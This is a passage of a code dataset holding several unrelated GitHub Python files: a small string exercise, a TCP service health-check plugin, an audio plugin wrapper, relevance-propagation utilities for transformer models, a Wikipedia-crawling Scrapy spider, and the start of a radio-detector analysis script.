+{"seq_id":"30077073517","text":"\"\"\"\r\n\n\nWrite a function that returns the most frequent character in a list of words.\n\n### Examples\n\n most_frequent_char([\"apple\", \"bandage\", \"yodel\", \"make\"])\n ➞ [\"a\", \"e\"]\n \n most_frequent_char([\"music\", \"madness\", \"maniac\", \"motion\"])\n ➞ [\"m\"]\n \n most_frequent_char([\"the\", \"hills\", \"are\", \"alive\", \"with\", \"the\", \"sound\", \"of\", \"music\"])\n ➞ [\"e\", \"h\", \"i\"]\n\n### Notes\n\n * If multiple characters tie for most frequent, list all of them in alphabetical order.\n * Words will be in lower case.\n\n\"\"\"\r\n\ndef most_frequent_char(lst):\n x = ''.join(lst)\n y = [x.count(i) for i in x]\n z = []\n for i in range(len(x)):\n if max(y) == y[i]:\n z.append(x[i])\n return sorted(list(set(z)))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KcD3bABvuryCfZAYv_10.py","file_name":"KcD3bABvuryCfZAYv_10.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23429131438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Yang'\n\nimport socket\nimport time\nimport json\nimport threadpool\n\nhostname=socket.gethostname()\n\nEntry = {\n \"Endpoint\": hostname,\n \"Timestamp\": int(time.time()),\n \"Step\": 60,\n }\n\n#端口超时时间默认设置为5秒\ndef check_tcp_port(kw, timeout=5):\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n address = (str(kw[\"host\"]), int(kw[\"port\"]))\n cs.settimeout(timeout)\n status = cs.connect_ex(address)\n cs.close()\n except Exception as e:\n return {\"status\": False, \"message\": str(e)}\n else:\n if status != 0:\n return {\"status\": False, \"message\": \"Connection %s:%s failed\" % (kw[\"host\"], kw[\"port\"])}\n else:\n return {\"status\": True, \"message\": \"OK\"}\n\ndef run_check(entry_list,host,port,metric_type):\n kw={\"host\": host,\"port\": port}\n status=check_tcp_port(kw=kw)\n if status['status'] == True:\n value=1\n else:\n value=0\n entry = Entry.copy()\n entry.update({\n \"CounterType\": \"GAUGE\",\n \"Metric\": \"tcp.status\",\n \"TAGS\": \"type={0},port={1}\".format(host,port),\n \"Value\": value\n })\n entry_list.append(entry)\n\ndef run_threadpool():\n args=[]\n #线程池预设为8,可以根据机器性能修改\n task_pool=threadpool.ThreadPool(8)\n for service in service_list:\n for host in service['ip']:\n args.append(([entry_list,host,service[\"port\"],service[\"name\"]],None))\n \n theads=threadpool.makeRequests(run_check,args)\n [task_pool.putRequest(req) for req in theads ]\n task_pool.wait()\n \n\nif __name__ == '__main__':\n entry_list = []\n service_list=[]\n #添加服务就按照下面的例子给service_list添加一个dict,\n service_list.append({ \n \"name\": \"zookeeper\" ,\n \"ip\": [\"192.168.1.100\",\"192.168.1.101\",\"192.168.1.102\"],\n \"port\": \"2181\"\n })\n \n service_list.append({\n \"name\": \"rabbitmq\" ,\n \"ip\": [\"192.168.1.103\",\"192.168.1.104\",\"192.168.1.105\"],\n \"port\": \"5672\"\n })\n\n run_threadpool()\n print(json.dumps(entry_list))\n","repo_name":"84372051/n9e_plugin","sub_path":"60_tcp-connect.py","file_name":"60_tcp-connect.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11677492350","text":"from ..processor import Processor\nfrom ..mfp_app import MFPApp\nfrom ..bang import Uninit\n\n\nclass Plugin(Processor):\n doc_tooltip_obj = \"LADSPA plugin host\"\n\n def __init__(self, init_type, init_args, patch, scope, name):\n initargs, kwargs = patch.parse_args(init_args)\n\n self.lib_name = None\n self.lib_index = None\n self.plug_info = None\n self.plug_name = None\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.dsp_inlets = []\n self.dsp_outlets = []\n self.inlet_map = {}\n\n if len(initargs):\n self.init_plugin(initargs[0])\n\n Processor.__init__(self, self.plug_inlets, self.plug_outlets, init_type, init_args,\n patch, scope, name)\n self.hot_inlets = list(range(self.plug_inlets))\n\n async def setup(self):\n await self.dsp_init(\n \"ladspa~\",\n lib_name=self.lib_name, lib_index=self.lib_index,\n plug_control=self.plug_control\n )\n\n def init_plugin(self, pname):\n\n pinfo = MFPApp().pluginfo.find(pname)\n self.plug_info = pinfo\n self.lib_name = pinfo.get(\"lib_name\")\n self.lib_index = pinfo.get(\"lib_index\")\n self.plug_name = pinfo.get(\"label\")\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.inlet_map = {}\n\n self.doc_tooltip_obj = (\n MFPApp().pluginfo.plugin_docstring(pinfo) or self.doc_tooltip_obj)\n self.doc_tooltip_inlet = []\n self.doc_tooltip_outlet = []\n\n portinfo = pinfo.get(\"ports\", [])\n\n for portnum, port in enumerate(portinfo):\n self.plug_control.append(0)\n d = port.get(\"descriptor\", 0)\n if d & MFPApp().pluginfo.LADSPA_PORT_INPUT:\n self.doc_tooltip_inlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_inlets.extend([self.plug_inlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.inlet_map[self.plug_inlets] = portnum\n self.plug_inlets += 1\n\n elif d & MFPApp().pluginfo.LADSPA_PORT_OUTPUT:\n self.doc_tooltip_outlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_outlets.extend([self.plug_outlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.plug_outlets += 1\n\n async def trigger(self):\n for portnum, value in enumerate(self.inlets):\n if value is not Uninit:\n self.plug_control[self.inlet_map.get(portnum, 0)] = float(value)\n await self.dsp_setparam(\"plug_control\", self.plug_control)\n\n\ndef register():\n MFPApp().register(\"plugin~\", Plugin)\n","repo_name":"bgribble/mfp","sub_path":"mfp/builtins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"32"}
+{"seq_id":"22672714018","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Any, Tuple\nimport torch.autograd as autograd\nfrom torch.nn import ModuleList, ModuleDict\n\n\ndef batch_jacobian(func, input: torch.Tensor):\n assert len(input.size()) == 2\n return torch.stack([autograd.functional.jacobian(func, t) for t in input])\n\n\ndef tuple_jacobian(func, inputs: Tuple[torch.Tensor], batch_dim=0):\n # only support batch_size = 1\n return autograd.functional.jacobian(func, inputs) # out_dims , input_dims\n\n\ndef batch_diag(t: torch.Tensor):\n batch_size, hid_size = t.size()\n diag_t = torch.zeros((batch_size, hid_size, hid_size)).to(t)\n diag_t.as_strided(t.size(), [diag_t.stride(0), diag_t.size(2) + 1,],).copy_(t)\n return diag_t\n\n\ndef batch_diag_value(v: torch.Tensor, m_size):\n assert len(v.size()) == 1\n batch_size = v.size(0)\n # print(v)\n diag_t = torch.zeros((batch_size, m_size, m_size)).to(v)\n diag_t = (diag_t + torch.eye(m_size).to(device=v.device)[None]) * v[:, None, None]\n # index = torch.arange(0,m_size, device=v.device)\n # diag_t[:,index,index] = v\n return diag_t\n\n\nclass LRP:\n \"\"\" Helper class for layerwise relevance propagation \"\"\"\n\n alpha = 1.0\n beta = 0.0\n eps = 1e-10\n use_alpha_beta = True # if False, uses simplified LRP rule: R_i = R_j * z_ji / ( z_j + eps * sign(z_j) )\n consider_attn_constant = (\n False # used by MultiHeadAttn, considers gradient w.r.t q/k zeros\n )\n norm_dim = 1\n\n @classmethod\n def relprop(\n cls,\n function,\n out_relevance,\n inputs: Tuple[torch.Tensor],\n reference_inputs=None,\n reference_output=None,\n jacobians=None,\n batch_dim=0,\n ):\n \"\"\"\n computes input relevance given output_relevance using z+ rule\n works for linear layers, convolutions, poolings, etc.\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n :param function: forward function\n :param output_relevance: relevance w.r.t. layer output\n :param inps: a list of layer inputs\n :param reference_inputs: \\hat x, default values used to evaluate bias relevance.\n If specified, must be a tuple/list of tensors of the same shape as inps, default = all zeros.\n :param reference_output: optional pre-computed function(*reference_inputs) to speed up computation\n :param jacobians: optional pre-computed jacobians to speed up computation, same as jacobians(function(*inps), inps)\n\n \"\"\"\n assert len(inputs) > 0, \"please provide at least one input\"\n\n alpha, beta, eps = cls.alpha, cls.beta, cls.eps\n\n reference_inputs = reference_inputs or [\n torch.zeros_like(input).to(input) for input in inputs\n ]\n assert len(reference_inputs) == len(inputs)\n\n output = function(*inputs)\n reference_output = (\n reference_output\n if reference_output is not None\n else function(*reference_inputs)\n )\n assert isinstance(output, torch.Tensor) and isinstance(\n reference_output, torch.Tensor\n )\n assert out_relevance.size() == output.size()\n\n flat_out_relevance = out_relevance.view(-1)\n output_size = flat_out_relevance.size(0)\n\n # 1. compute jacobian w.r.t. all inputs\n jacobians = (\n jacobians if jacobians is not None else tuple_jacobian(function, inputs)\n )\n # ^-- list of [*output_dims, *input_dims] for each input\n assert len(jacobians) == len(inputs)\n\n jac_flat_components = [jac.view(output_size, -1) for jac in jacobians]\n # ^-- list of [output_size, input_size] for each input\n flat_jacobian = torch.cat(\n jac_flat_components, dim=-1\n ) # [output_size, combined_input_size]\n\n # 2. 
multiply jacobian by input to get unnormalized relevances, add bias\n\n flat_input = torch.cat(\n [input.view(-1) for input in inputs], dim=-1\n ) # [combined_input_size]\n flat_reference_input = torch.cat(\n [ref_input.view(-1) for ref_input in reference_inputs], dim=-1\n ) # [combined_input_size]\n batch_size = output.size(batch_dim)\n input_size_per_sample = flat_input.size(0) // batch_size\n flat_bias_impact = reference_output.view(-1) / input_size_per_sample\n\n flat_impact = (\n flat_bias_impact[:, None]\n + flat_jacobian * (flat_input - flat_reference_input)[None, :]\n )\n\n # ^-- [output_size, combined_input_size], aka z_{j<-i}\n\n if cls.use_alpha_beta:\n # 3. normalize positive and negative relevance separately and add them with coefficients\n flat_positive_impact = torch.maximum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_positive_normalizer = (\n torch.sum(flat_positive_impact, dim=cls.norm_dim, keepdim=True) + eps\n )\n flat_positive_relevance = flat_positive_impact / flat_positive_normalizer\n\n flat_negative_impact = torch.minimum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_negative_normalizer = (\n torch.sum(flat_negative_impact, dim=cls.norm_dim, keepdim=True) - eps\n )\n flat_negative_relevance = flat_negative_impact / flat_negative_normalizer\n flat_total_relevance_transition = (\n alpha * flat_positive_relevance + beta * flat_negative_relevance\n )\n else:\n raise NotImplemented()\n # flat_impact_normalizer = tf.reduce_sum(flat_impact, axis=cls.norm_axis, keep_dims=True)\n # flat_impact_normalizer += eps * (1. - 2. * tf.to_float(tf.less(flat_impact_normalizer, 0)))\n # flat_total_relevance_transition = flat_impact / flat_impact_normalizer\n # note: we do not use tf.sign(z) * eps because tf.sign(0) = 0, so zeros will not go away\n\n flat_in_relevance = torch.einsum(\n \"o,oi\", flat_out_relevance, flat_total_relevance_transition\n )\n # ^-- [combined_input_size]\n\n # 5. 
unpack flat_inp_relevance back into individual tensors\n in_relevances = []\n offset = 0\n for input in inputs:\n input_size = input.view(-1).size(0)\n inp_relevance = flat_in_relevance[offset : offset + input_size].view_as(\n input\n )\n in_relevances.append(inp_relevance)\n offset = offset + input_size\n\n return cls.rescale(out_relevance, in_relevances, batch_dim=batch_dim)\n\n @classmethod\n def rescale(\n cls,\n out_relevance: torch.Tensor,\n in_relevances: Tuple[torch.Tensor],\n batch_dim=None,\n ):\n # assert isinstance(batch_axes, (tuple, list))\n sum_dims = tuple(\n i\n for i in range(len(in_relevances[0].size()))\n if batch_dim is None or i != batch_dim\n )\n ref_scale = out_relevance.abs().sum(\n dim=sum_dims, keepdim=True\n ) # batch_size x 1*\n inp_scales = [\n in_relevance.abs().sum(dim=sum_dims, keepdim=True)\n for in_relevance in in_relevances\n ] # list[batch_size x 1*]\n total_inp_scale = sum(inp_scales) + cls.eps # batch_size x 1*\n in_relevances = [\n in_relevance * (ref_scale / total_inp_scale)\n for in_relevance in in_relevances\n ]\n return in_relevances\n\n\nclass LRPWrapper(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.store = {}\n\n def record(self, key, value):\n assert key not in self.store or self.store[key] is None\n self.store[key] = value\n\n def get_record(self, key):\n assert key in self.store and self.store[key] is not False\n if key not in self.store:\n return None\n return self.store[key]\n\n def clear_record(self):\n self.store.clear()\n for key, value in self._modules.items():\n if isinstance(value, LRPWrapper):\n value.clear_record()\n elif isinstance(value, ModuleList):\n for module in value:\n if isinstance(module, LRPWrapper):\n module.clear_record()\n elif isinstance(value, ModuleDict):\n for _, module in value.items():\n if isinstance(module, LRPWrapper):\n module.clear_record()\n\n def relprop(self, out_relevance):\n raise NotImplemented()\n\n\nclass AddWrapper(LRPWrapper):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x, y, record=False):\n if record:\n self.record(\"input1\", x)\n self.record(\"input2\", y)\n return x + y\n\n def relprop(self, out_relevance):\n input1 = self.get_record(\"input1\")\n input2 = self.get_record(\"input2\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input1 = input1.view(-1, input1.size(-1))\n flat_input2 = input2.view(-1, input2.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input1[i, None], flat_input2[i, None]),\n jacobians=[\n torch.eye(flat_input1.size(-1)).to(out_relevance)[None, :, None, :],\n torch.eye(flat_input2.size(-1)).to(out_relevance)[None, :, None, :],\n ],\n )\n for i in range(len(flat_input1))\n ]\n\n flat_in_relevance1 = torch.cat([items[0] for items in flat_in_relevance], dim=0)\n flat_in_relevance2 = torch.cat([items[1] for items in flat_in_relevance], dim=0)\n\n # flat_in_relevance1, flat_in_relevanc2 = LRP.relprop(\n # self, flat_out_relevance, (flat_input1, flat_input2)\n # )\n in_relevance1 = flat_in_relevance1.view_as(input1)\n in_relevance2 = flat_in_relevance2.view_as(input2)\n\n return in_relevance1, in_relevance2\n\n\nclass LinearWrapper(LRPWrapper):\n def __init__(self, linear: torch.nn.Module, activation_fn=None) -> None:\n super().__init__()\n self.weight = linear.weight\n self.bias = 
linear.bias\n self.activation_fn = activation_fn\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n x = x.matmul(self.weight.t())\n if self.bias is not None:\n x = x + self.bias\n if self.activation_fn is not None:\n x = self.activation_fn(x)\n return x\n\n def relprop(self, out_relevance):\n\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[self.weight[None, :, None, :]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # if flat_input.size(0) == 1:\n # flat_in_relevance = LRP.relprop(\n # self,\n # flat_out_relevance,\n # (flat_input,),\n # jacobians=[self.weight[None, :, None, :]],\n # )[0]\n # else:\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass LayerNormWrapper(LRPWrapper):\n \"\"\"\n Performs Layer Normalization\n \"\"\"\n\n def __init__(self, layernorm) -> None:\n super().__init__()\n self.weight = layernorm.weight\n self.bias = layernorm.bias\n self.epsilon = layernorm.eps\n self.normalized_shape = layernorm.normalized_shape\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n\n return F.layer_norm(\n x, self.normalized_shape, self.weight, self.bias, self.epsilon\n )\n\n def _jacobian(self, input):\n assert len(input.size()) == 2, \"Please reshape your inputs to [batch, dim]\"\n batch_size = input.size(0)\n hid_size = input.size(1)\n centered_input = input - torch.mean(input, dim=-1, keepdim=True)\n variance = torch.var(centered_input, dim=-1, unbiased=False, keepdim=True)\n invstd_factor = torch.rsqrt(variance)\n\n # note: the code below will compute jacobian without taking self.scale into account until the _last_ line\n # jac_out_wrt_invstd_factor = centered_input\n jac_out_wrt_variance = -0.5 * (variance + self.epsilon) ** (-1.5)\n\n jac_out_wrt_squared_difference = jac_out_wrt_variance / hid_size\n\n jac_out_wrt_centered_input = (\n batch_diag_value(invstd_factor[:, 0], hid_size)\n + jac_out_wrt_squared_difference[:, :, None]\n * 2\n * centered_input[:, None, :]\n * centered_input[:, :, None]\n )\n\n # jac_out_wrt_input = torch.matmul(\n # jac_out_wrt_centered_input,\n # (\n # torch.eye(hid_size).to(input)\n # - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n # ),\n # )\n jac_out_wrt_input = torch.matmul(\n jac_out_wrt_centered_input.float(),\n (\n torch.eye(hid_size).to(input)\n - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n ).float(),\n )\n return jac_out_wrt_input.half() # batch x hid_size x hid_size\n # return jac_out_wrt_input # batch x hid_size x hid_size\n\n def relprop(self, out_relevance):\n \"\"\"\n computes input relevance given output_relevance\n :param output_relevance: relevance w.r.t. 
layer output, [*dims, out_size]\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n \"\"\"\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n jacobians = self._jacobian(flat_input)\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[jacobians[i, None]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass FFNWrapper(LRPWrapper):\n \"\"\"\n Feed-forward layer\n \"\"\"\n\n def __init__(self, linear_in: LinearWrapper, linear_out: LinearWrapper):\n super().__init__()\n self.linear_in = linear_in\n self.linear_out = linear_out\n\n def forward(self, x, record=False):\n x = self.linear_in(x, record=record)\n x = self.linear_out(x, record=record)\n\n def relprop(self, out_relevance):\n mid_relevance = self.linear_out.relprop(out_relevance)\n in_relevance = self.linear_in.relprop(mid_relevance)\n return in_relevance\n\n","repo_name":"DoubleVII/my-fairseq","sub_path":"fairseq/models/transformer_lrp/lrp_utils.py","file_name":"lrp_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
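A minimal torch sketch of the alpha-beta relevance rule the LRP class above generalizes, applied to a single bias-free linear layer (alpha=1, beta=0, i.e. the z+ special case):

import torch

def linear_relprop(W, x, R_out, alpha=1.0, beta=0.0, eps=1e-10):
    # contribution of input i to output j: z_ji = W[j, i] * x[i]
    z = W * x[None, :]                                  # [out, in]
    # positive and negative contributions normalized per output unit
    z_pos = z.clamp(min=0) / (z.clamp(min=0).sum(1, keepdim=True) + eps)
    z_neg = z.clamp(max=0) / (z.clamp(max=0).sum(1, keepdim=True) - eps)
    return R_out @ (alpha * z_pos + beta * z_neg)       # [in]

W = torch.randn(4, 3)
x = torch.randn(3)
R = torch.softmax(W @ x, dim=0)   # toy output relevance, sums to 1
print(linear_relprop(W, x, R))    # input relevance, conserves the total mass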
+{"seq_id":"9233882995","text":"from ..preProcess import preProcessStr, normalizeStr\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass WikiSpiderSpider(CrawlSpider):\n name = \"wiki_spider\"\n allowed_domains = [\"en.wikipedia.org\"]\n\n start_urls = [\n \"https://en.wikipedia.org/wiki/List_of_Marvel_Cinematic_Universe_films\"\n ]\n\n allow_urls = [r\"wiki/\"]\n deny_urls = [\n r\"wiki/Main_Page\",\n r\"wiki/Category:\",\n r\"wiki/Help:\",\n r\"wiki/ISO\",\n r\"wiki/Portal:\",\n r\"wiki/Special:\",\n r\"wiki/Talk:\",\n r\"wiki/Template:\",\n r\"wiki/Template_talk:\",\n r\"wiki/User_talk:\",\n r\"wiki/Wikipedia:\",\n r\"wiki/Wikipedia_talk:\",\n ]\n rules = (\n Rule(\n LinkExtractor(allow=allow_urls, deny=deny_urls),\n callback=\"parse_item\",\n follow=True,\n ),\n )\n\n N = 15000\n count = 0\n\n def parse_item(self, response):\n if self.count >= self.N:\n raise CloseSpider(f\"Scraped {self.N} items. Eject!\")\n\n self.count += 1\n\n data = {}\n data[\"page_url\"] = response.url\n\n data[\"page_title\"] = \"\".join(\n response.xpath(\n '//*[@id=\"firstHeading\"]/descendant-or-self::*/text()'\n ).getall()\n )\n\n maxDescriptionLen = 157\n description = \"\"\n totalP = int(float(response.xpath(\"count(/descendant::p)\").get()))\n numP = 0\n while len(description) < maxDescriptionLen and numP < totalP:\n description += normalizeStr(\n \" \".join(\n response.xpath(\n f\"/descendant::p[{numP}]/descendant-or-self::*/text()\"\n ).getall()\n )\n )\n numP += 1\n\n description = normalizeStr(description).strip()\n data[\"page_description\"] = (\n (description[:maxDescriptionLen] + \"...\")\n if len(description) > maxDescriptionLen\n else description\n )\n\n data[\"page_content\"] = preProcessStr(\n \" \".join(response.xpath(\"//p/descendant-or-self::*/text()\").getall())\n )\n\n headings = {}\n for i in range(2, 7):\n head_val = preProcessStr(\n \" \".join(\n response.xpath(f\"//h{i}/descendant-or-self::*/text()\").getall()\n )\n )\n if head_val:\n headings[f\"h{i}\"] = head_val\n\n data |= headings\n\n info_card = {}\n rows = response.xpath(\n '//*[@id=\"mw-content-text\"]/div[1]/table[contains(@class, \"infobox\")]/tbody/tr'\n )\n for row in rows:\n if row.xpath('./th[@class=\"infobox-above summary\"]'):\n continue\n\n img_box = row.xpath(\n './td[@class=\"infobox-image\"]/a[@class=\"image\"]/img/@src'\n )\n if img_box:\n info_card[\"img_url\"] = img_box.get()\n continue\n\n label_box = row.xpath('./th[@class=\"infobox-label\"]')\n if label_box:\n key = preProcessStr(\n \" \".join(\n label_box.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if not key:\n continue\n\n label_data = row.xpath('./td[@class=\"infobox-data\"]')\n if label_data:\n value = preProcessStr(\n \" \".join(\n label_data.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if value:\n info_card[key] = value\n\n data |= info_card\n\n # Invoking the shell from spiders to inspect responses\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n return data\n","repo_name":"Smile040501/Search-Engine","sub_path":"wiki_crawler/wiki_crawler/spiders/wiki_spider.py","file_name":"wiki_spider.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43480665729","text":"#!/usr/bin/env python3\n'''\nThis will add to the functionality of flipbook_reader.py and take any eventids_dict and try to collate the information\nfor the contained events into an excel file for easy note taking and viewing. It attempts to add airplane information\nand thus should be run with code that has pandas version >= 1.4.0. This version is also necessary for the used\n\"overlay\" function when writing to excel. \n'''\n\nimport sys\nimport os\nimport inspect\nimport h5py\nimport copy\nfrom pprint import pprint\n\nimport numpy\nimport scipy\nimport scipy.signal\nimport time\nimport pandas as pd\n\n#from beaconroot.examples.beacon_data_reader import Reader #Must be imported before matplotlib or else plots don't load.\nfrom beacon.tools.sine_subtract_cache import sineSubtractedReader as Reader\nfrom beacon.tools.data_handler import createFile\nfrom beacon.tools.fftmath import TemplateCompareTool\nfrom beacon.tools.fftmath import FFTPrepper\nfrom beacon.tools.correlator import Correlator\nfrom beacon.tools.data_slicer import dataSlicer\nfrom beacon.tools.flipbook_reader import flipbookToDict, concatenateFlipbookToDict, concatenateFlipbookToArray, concatenateEventDictToArray\nimport beacon.tools.get_plane_tracks as pt\nfrom tools.airplane_traffic_loader import getDataFrames, getFileNamesFromTimestamps\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib import cm, ticker\nfrom matplotlib.patches import Rectangle\nplt.ion()\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nraw_datapath = os.environ['BEACON_DATA']\n#processed_datapath = os.path.join(os.environ['BEACON_PROCESSED_DATA'],'backup_pre_all_map_run_12-5-2021')\nprocessed_datapath = os.environ['BEACON_PROCESSED_DATA']\nprint('SETTING processed_datapath TO: ', processed_datapath)\n\ndef enu2Spherical(enu):\n '''\n 2d array like ((e_0, n_0, u_0), (e_1, n_1, u_1), ... 
, (e_i, n_i, u_i))\n\n Return in degrees\n '''\n r = numpy.linalg.norm(enu, axis=1)\n theta = numpy.degrees(numpy.arccos(enu[:,2]/r))\n phi = numpy.degrees(numpy.arctan2(enu[:,1],enu[:,0]))\n # import pdb; pdb.set_trace()\n return numpy.vstack((r,phi,theta)).T\n\n\ndef writeEventDictionaryToDataFrame(initial_eventids_dict, ds=None, include_airplanes=True):\n try:\n data_keys = [\n 'calibrated_trigtime',\n 'phi_best_choice',\n 'elevation_best_choice',\n 'cr_template_search_h',\n 'cr_template_search_v',\n 'cr_template_search_hSLICERMAXcr_template_search_v',\n 'hpol_peak_to_sidelobe',\n 'vpol_peak_to_sidelobe',\n 'hpol_peak_to_sidelobeSLICERMAXvpol_peak_to_sidelobe',\n 'hpol_normalized_map_value',\n 'vpol_normalized_map_value',\n 'above_normalized_map_max_line',\n 'above_snr_line',\n 'impulsivity_h',\n 'impulsivity_v',\n 'impulsivity_hSLICERADDimpulsivity_v',\n 'similarity_count_h',\n 'similarity_count_v',\n 'p2p_gap_h',\n 'p2p_gap_v',\n 'csnr_h',\n 'csnr_v',\n 'snr_h',\n 'snr_v',\n 'p2p_h',\n 'p2p_v',\n 'std_h',\n 'std_v',\n 'filtered_std_h',\n 'filtered_std_v',\n 'filtered_snr_h',\n 'filtered_snr_v',\n 'filtered_p2p_h',\n 'filtered_p2p_v',\n 'filtered_p2p_gap_h',\n 'filtered_p2p_gap_v',\n 'filtered_csnr_h',\n 'filtered_csnr_v']\n\n if numpy.all([numpy.issubdtype(k, numpy.integer) for k in initial_eventids_dict.keys()]) or numpy.all(numpy.array(list(initial_eventids_dict.keys()))%1 == 0):\n print('Assuming passed \"initial_eventids_dict\" as eventids_dict format')\n eventids_dict = copy.deepcopy(initial_eventids_dict)\n eventids_array = concatenateEventDictToArray(initial_eventids_dict)\n else:\n print('Assuming passed \"initial_eventids_dict\" as flipbook format')\n eventids_dict = concatenateFlipbookToDict(initial_eventids_dict)\n eventids_array = concatenateFlipbookToArray(initial_eventids_dict)\n\n runs = list(eventids_dict.keys())\n\n force_fit_order = 3 #None to use varying order\n\n # outpath = './airplane_event_flipbook_%i'%time.time() \n # os.mkdir(outpath)\n\n\n if ds is None:\n print(\"Preparing dataSlicer\")\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_16384-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, analysis_data_dir=processed_datapath, verbose_setup=False)\n ds.prepareCorrelator()\n else:\n print('Using passed dataSlicer')\n\n status = numpy.zeros(len(eventids_array), dtype=str)\n\n data = { \n 'run' : eventids_array['run'],\n 'eventid' : eventids_array['eventid'],\n 'key' : eventids_array['key'],\n }\n\n monutau_links = []\n for eid in eventids_array:\n eventid = eid['eventid']\n run = eid['run']\n url = \"https://users.rcc.uchicago.edu/~cozzyd/monutau/#event&run=%i&entry=%i\"%(run,eventid)\n monutau_links.append('=HYPERLINK(\"%s\", \"link\")'%url)\n\n data['monutau'] = numpy.asarray(monutau_links)\n data['notes'] = [numpy.nan]*len(eventids_array)\n\n for key in data_keys:\n d = ds.getDataArrayFromParam(key, trigger_types=None, 
